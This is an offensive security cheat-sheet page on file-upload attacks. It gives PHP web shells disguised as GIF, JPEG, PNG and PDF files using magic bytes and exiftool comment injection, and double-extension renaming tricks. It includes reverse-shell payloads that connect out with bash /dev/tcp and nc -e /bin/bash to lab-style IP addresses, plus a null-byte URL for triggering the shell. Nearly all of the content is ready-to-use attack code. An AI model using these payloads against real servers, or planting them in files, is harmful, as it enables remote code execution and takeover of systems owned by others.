File Upload with reverse shell

GIF

# Web shell - wshell.gif
# Magic bytes for GIF
GIF89a;
<?php system($_GET['cmd']) ?>

# reverse shell - rshell.gif
GIF89a:
<?php system('bash -i >& /dev/tcp/10.10.14.5/1234 0>&1 ') ?>

JPEG

# file.php.jpg or file.jpg.php
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' file.jpg
mv file.jpg file.php.jpg
#or
mv file.jpg file.jpg.php

# Magic byte for JPEG
echo -e '\xff\xd8\xff\xdb' > fake.php.jpg
vim fake.php.jpg
# Add the php script to the jpg file, such as 
# <?php system('nc 10.10.14.19 9090 -e /bin/bash'); ?>

PNG

<?php system($_GET['cmd']); ?>  //shell.php
exiftool "-comment<=shell.php" malicious.png
strings malicious.png | grep system

WORD

See Macro section.

PDF

# Web shell

%PDF-1.4
<?php system($_GET["cmd"]);?>

# http://<RHOST>/index.php?page=uploads/<FILE>.pdf%00&cmd=whoami

Metasploit

Metasploit Unleashed | Client Side Exploitswww.offsec.com

EvilPDF

Steps to embed payload in PDF [100% Working] | GoLinuxCloudGoLinuxCloud

CVE-2018-9958

ZIP

// Some code

PreviousFile Upload NextFile Extension Discovery for upload

Last updated 1 year ago